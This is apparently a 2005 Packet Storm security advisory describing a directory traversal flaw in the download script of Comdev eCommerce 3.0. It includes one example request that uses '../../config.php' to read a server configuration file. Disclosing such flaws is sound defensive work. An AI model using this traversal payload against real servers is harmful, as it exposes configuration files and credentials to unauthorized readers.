comdevTraversal.txt

2005-08-06T00:00:00
ID PACKETSTORM:39069
Type packetstorm
Reporter Packet Storm
Modified 2005-08-06T00:00:00

Description

                                        
                                            `Class: Input Validation Error   
Vulnerable: Comdev Comdev eCommerce 3.0   
  
The wce.download.php script (present in two locations) can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server.  
  
Example:  
  
http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=../../config.php  
`